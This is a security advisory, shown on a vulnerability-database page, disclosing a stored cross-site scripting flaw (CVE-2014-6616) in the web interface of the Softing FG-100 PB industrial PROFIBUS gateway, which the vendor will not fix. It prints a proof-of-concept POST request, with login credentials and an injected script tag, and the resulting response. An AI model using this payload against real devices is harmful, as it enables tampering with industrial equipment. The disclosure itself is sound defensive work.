Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:31371
HistoryNov 10, 2014 - 12:00 a.m.

CVE-2014-6616 Softing FG-100 Webui XSS

2014-11-1000:00:00
vulners.com
71
JSON

#############################################################

COMPASS SECURITY ADVISORY

http://www.csnc.ch/en/downloads/advisories.html

#############################################################

Product: Softing FG-100 PB

Vendor: Softing AG (www.softing.com)

CVD ID: CVE-2014-6616

Subject: XSS

Risk: High

Effect: Remotely exploitable

Author: Johannes Klick

Daniel Marzin

Ingmar Rosenhagen

Date: 05.11.2014

#############################################################

Introduction:

Softing FG PROFIBUS 1 is a family of interfaces for remote access to
one, two or three PROFIBUS segments via Ethernet for device
parameterization, controller programming and data acquisition. This
device is used in industrial setups for making Profibus device available
via ethernet. Compass Security Deuschland GmbH [2] discovered a security
flaw in the webgui of the device which allows execution of malicious
code in the context of the user's browser session.

Affected:

Firmware: FG-x00-PB_V2.02.0.00

Technical Description:

The web gui does not properly encode output of user data in at least one
place. Exploiting this vulnerability leads to stored cross-site
scripting (XSS) and allows execution of JavaScript code

The vulnerable resource is the 'DEVICE_NAME' parameter:

POST /cgi-bin/CFGhttp HTTP/1.1
Host: 192.168.2.3
Referer: http://192.168.2.3/cgi-bin/CFGhttp

second_chance=Yes&LOGIN=config&PASSWORD=password&SERIAL_NUMBER=0110000000&DE
VICE_NAME=<SCRIPT>alert("XSS")</SCRIPT>&DEVICE_NAME_ORG=ROFLE&IPADDR=192.168
.2.3&IPADDR_ORG=192.168.2.3&NETMASK=255.255.255.0&NETMASK_ORG=255.255.255.0&
GATEWAY=0.0.0.0&GATEWAY_ORG=&MAINTENANCE_IP=192.168.212.231&MAINTENANCE_IP_O
RG=192.168.212.231&STARTUP=RELOAD

Which results in the malicious code being embedded:

HTTP/1.0 200 OK
Content-type: text/html
Cache-Control: no-cache, must-revalidate
Pragma: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01
Transitional//EN""http://www.w3.org/TR/html4/strict.dtd&quot;&gt;
<html><head><title>Device Configuration</title></head><link
rel="stylesheet" type="text/css"
href="…/fg300_pb/styles/fg300_pb.css"><body><h1>New Network
Settings</h1><table cellspacing=0 summary=""><tr><td><strong> Host Name
</strong></td><td> <SCRIPT>alert("XSS")</SCRIPT> </td><td>
</td></tr><tr><td><strong> IP Address </strong></td><td> 192.168.2.3
</td><td> </td></tr><tr><td><strong> Subnet Mask
</strong></td><td> 255.255.255.0 </td><td>
</td></tr><tr><td><strong> Default Gateway </strong></td><td>
</td><td> </td></tr><tr><td><strong> Maintenance IP Address
</strong></td><td> 192.168.212.231 </td><td>
</td></tr><tr><td><strong> New network parameters will be used
</strong></td><td> immediately
</td><td></td></tr></table><br></body></html>

Workaround / Fix:

no patch is available

Timeline:

Vendor Notified: 2014-09-15
Vendor Response: 2014-10-24
Vendor Status: Wont fix

References:

ble-single-channel-remote-interface.html
[2]: http://www.csnc.de

Related

packetstorm 1
prion 1
cve 1
securityvulns 1
packetstorm
packetstorm
Softing FG-100 PB Cross Site Scripting
2014-11-05 00:00:00
prion
prion
Cross site scripting
2015-08-31 18:59:00
cve
cve
CVE-2014-6616
2015-08-31 18:59:00
securityvulns
securityvulns
Softing FG-100 security vulnerabilities
2014-11-10 00:00:00
JSON
Related for SECURITYVULNS:DOC:31371
packetstorm1prion1cve1securityvulns1